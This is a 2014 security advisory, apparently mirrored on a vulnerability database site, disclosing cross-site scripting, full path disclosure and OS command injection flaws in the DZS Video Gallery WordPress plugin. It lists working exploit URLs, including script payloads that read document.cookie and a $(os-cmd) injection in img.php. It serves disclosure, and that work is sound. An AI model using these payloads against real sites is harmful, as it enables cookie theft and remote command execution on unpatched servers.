Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:31062
HistoryAug 26, 2014 - 12:00 a.m.

XSS, FPD and RCE vulnerabilities in DZS Video Gallery for WordPress

2014-08-2600:00:00
vulners.com
58
JSON

Hello 3APA3A!

These are Cross-Site Scripting, Full path disclosure and OS Commanding vulnerabilities in plugin DZS Video Gallery for WordPress.

Earlier I've disclosed Content Spoofing and Cross-Site Scripting vulnerabilities in this plugin (http://securityvulns.ru/docs30871.html).

Affected products:

Vulnerable are all versions of DZS Video Gallery for WordPress.

Affected vendors:

Digital Zoom Studio
http://digitalzoomstudio.net

Details:

Cross-Site Scripting (WASC-08):

http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?designrand=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure (WASC-13):

http://site/wp-content/plugins/dzs-videogallery/videogallery.php

http://site/wp-content/plugins/dzs-videogallery/admin/sliderexport.php

FPD in php-files of the plugin (by default) or in error_log - in all folders of the plugin. The files vary depending on version of the plugin.

OS Commanding (WASC-31):

http://site/wp-content/plugins/dzs-videogallery/img.php?webshot=1&src=http://site/1.jpg$(os-cmd)

RCE using method of Pichaya Morimoto (http://seclists.org/fulldisclosure/2014/Jun/117).

Timeline:

2014.05.08 - announced at my site.
2014.05.09 - informed developer, but he ignored.
2014.07.12 - disclosed at my site (http://websecurity.com.ua/7152/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

JSON